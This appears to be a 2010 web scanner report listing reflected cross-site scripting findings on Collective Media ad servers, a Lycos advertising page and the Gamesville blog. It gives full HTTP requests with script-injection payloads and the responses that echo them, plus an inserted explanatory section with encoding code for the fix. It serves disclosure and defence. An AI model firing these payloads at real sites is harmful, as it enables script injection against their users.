GET /adj/cm.idg_b2cdbf0b'-alert(1)-'46a749859b1/;sz=728x90;ord=5241744? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 435
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.4. http://a.collective-media.net/adj/cm.idg_b2c/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.idg_b2c/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3623'-alert(1)-'5d6c2e0b2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?&f3623'-alert(1)-'5d6c2e0b2b0=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 439
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e57e3'-alert(1)-'64cfe680192 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.idg_b2c/;sz=728x90;ord=5241744?e57e3'-alert(1)-'64cfe680192 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 436
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93955'-alert(1)-'f68ab19aedd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos93955'-alert(1)-'f68ab19aedd/;tile=1;sz=728x90;ord=123456789? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:39 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
3.7. http://a.collective-media.net/adj/idgt.lycos/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/idgt.lycos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7e41'-alert(1)-'e57b49161fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?&c7e41'-alert(1)-'e57b49161fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a4b'-alert(1)-'bb4ad577c5f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/idgt.lycos/;tile=1;sz=728x90;ord=123456789?56a4b'-alert(1)-'bb4ad577c5f HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal; domain=collective-media.net; path=/; expires=Tue, 11-Jan-2011 14:26:38 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d086f'-alert(1)-'0c5afc10a60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7161
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-75049847_1292163999","http://ad.doubleclick.net/adjd086f'-alert(1)-'0c5afc10a60/idgt.lycos/;net=idgt;u=,idgt-75049847_1292163999,,webdevelopment,;;tile=1;cmw=owl;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
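The a.collective-media.net findings above (3.4 through the one just shown) all share one sink: a value taken from the URL path or query string is concatenated into a single-quoted JavaScript string that the ad loader later writes into the page. A payload of the form '-alert(1)-' therefore closes the string, runs as code, and reopens a string so the statement still parses. The following is an added example, not code from the report or from the ad server. It models that sink with a deliberately simplified template (the renderAdScript* functions, the stub CollectiveMedia object and the stub alert are assumptions made for illustration; the real loader emits a much longer <scr'+'ipt> block, but the string context is the same), then shows the encoder that closes the hole: every character outside [A-Za-z0-9] is escaped as \xHH or \uHHHH before the value enters a JavaScript string literal.

```javascript
// Added example (not part of the scanner report): a simplified model of the
// JavaScript-string sink behind the a.collective-media.net findings and the fix.

// Payload copied from the report (REST URL parameter 2 of /adj/idgt.lycos/).
const REPORTED_PAYLOAD = "93955'-alert(1)-'f68ab19aedd";

// Vulnerable sink: the path segment is concatenated into a single-quoted JS
// string literal. The template is an assumption for illustration.
function renderAdScriptVulnerable(pathSegment) {
  return "CollectiveMedia.createAndAttachAd('http://ad.doubleclick.net/adj/" +
    pathSegment + "/;sz=728x90');";
}

// Encoder for the JavaScript-string context: every character outside
// [A-Za-z0-9] becomes \xHH (or \uHHHH above U+00FF). The value can then never
// contain a bare quote, backslash or newline, and because '<' and '/' are
// encoded too it cannot smuggle in a "</script>" that would end the
// surrounding script block regardless of how the string is quoted.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Same template, with the value encoded for the context it lands in.
function renderAdScriptSafe(pathSegment) {
  return "CollectiveMedia.createAndAttachAd('http://ad.doubleclick.net/adj/" +
    encodeForJsString(pathSegment) + "/;sz=728x90');";
}

// Runs a generated statement against stub CollectiveMedia and alert objects
// (assumptions standing in for the browser) and reports what happened: whether
// alert() fired, and which URL the ad function actually received. Function()
// is acceptable here only because the input is our own generated code.
function runWithStubs(js) {
  const result = { alertFired: false, url: null };
  const CollectiveMedia = { createAndAttachAd: (url) => { result.url = url; } };
  const alert = () => { result.alertFired = true; };
  new Function("CollectiveMedia", "alert", js)(CollectiveMedia, alert);
  return result;
}

// Stand-alone demonstration: the vulnerable render fires alert(1) and hands
// the ad function NaN; the encoded render fires nothing and delivers the
// original path segment, quotes and all, as plain data.
const vulnerable = runWithStubs(renderAdScriptVulnerable(REPORTED_PAYLOAD));
const safe = runWithStubs(renderAdScriptSafe(REPORTED_PAYLOAD));
console.log("vulnerable: alert fired =", vulnerable.alertFired, "url =", vulnerable.url);
console.log("safe:       alert fired =", safe.alertFired, "url =", safe.url);
```

Two caveats a practitioner would add. First, in the report's real pages the string being built is itself HTML that the loader passes to document.write, so the JavaScript-string encoding above is necessary but the markup inside the string still needs HTML encoding for its own context; stacking the two encoders in the right order is exactly the kind of thing that gets missed, which is why the report's remediation says to keep user data out of script context altogether (for instance by placing it in a data attribute, HTML-encoded, and reading it from script). Second, HTML entity encoding on its own would not have helped here: inside a script block the browser does not decode entities, so &#39; would reach the JavaScript parser as six literal characters and the injected quote would stay live.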
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f15f'-alert(1)-'146c6c088c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;tile=1;sz=728x90;net=idgt;ord=123456789;env=ifr;ord1=795724;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7153
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-61396396_1292163999","http://ad.doubleclick.net/adj/idgt.lycos9f15f'-alert(1)-'146c6c088c2/;net=idgt;u=,idgt-61396396_1292163999,,webdevelopment,;;tile=1;sz=728x90;net=idgt;env=ifr;ord1=795724;contx=webdevelopment;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
3.11. http://a.collective-media.net/cmadj/idgt.lycos/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /cmadj/idgt.lycos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c5'-alert(1)-'3504f397cdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos/;tile=1;sz=728x90;net=idgt;ord=123456789;&717c5'-alert(1)-'3504f397cdd=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sun, 12 Dec 2010 14:26:57 GMT
Content-Length: 7117
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... pt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-96303716_1292164017","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-96303716_1292164017,,none,;;tile=1;sz=728x90;net=idgt;&717c5'-alert(1)-'3504f397cdd=1;contx=none;dc=d;btg=;ord=123456789?","728","90",false);</scr'+'ipt> ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49010'-alert(1)-'a3461bb3ff4 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/idgt.lycos/;tile=49010'-alert(1)-'a3461bb3ff4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:26:38 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7074
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("idgt-3700236_1292163998","http://ad.doubleclick.net/adj/idgt.lycos/;net=idgt;u=,idgt-3700236_1292163998,,none,;;tile=49010'-alert(1)-'a3461bb3ff4;contx=none;dc=d;btg=?","0","0",false);</scr'+'ipt> ...[SNIP]...
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 842fd"><script>alert(1)</script>7285f314683 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images842fd"><script>alert(1)</script>7285f314683 HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_images842fd"><script>alert(1)</script>7285f314683&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce66"><script>alert(1)</script>ebf8b4cdc1d was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&cat=images HTTP/1.1
Host: advertising.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15554
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Advertise@L ...[SNIP]... <a href="http://mail.lycos.com/?utm_source=lycostab_multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&utm_campaign=home_mail&utm_medium=networkbar"> ...[SNIP]...
3.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://blog.gamesville.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc939"><script>alert(1)</script>3fc3efe8798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc939\"><script>alert(1)</script>3fc3efe8798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bc939"><script>alert(1)</script>3fc3efe8798=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64783
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e58b"><script>alert(1)</script>e67fb4e0f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e58b\"><script>alert(1)</script>e67fb4e0f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b"><script>alert(1)</script>e67fb4e0f35=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62622
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e28c3"><script>alert(1)</script>c1dd954abbb was submitted in the REST URL parameter 3. This input was echoed as e28c3\"><script>alert(1)</script>c1dd954abbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3"><script>alert(1)</script>c1dd954abbb HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28969
3.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b54dd"><script>alert(1)</script>f9d8de1e657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b54dd\"><script>alert(1)</script>f9d8de1e657 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd"><script>alert(1)</script>f9d8de1e657=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62703
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d07"><script>alert(1)</script>d04b7f19c87 was submitted in the REST URL parameter 3. This input was echoed as b2d07\"><script>alert(1)</script>d04b7f19c87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07"><script>alert(1)</script>d04b7f19c87 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28970
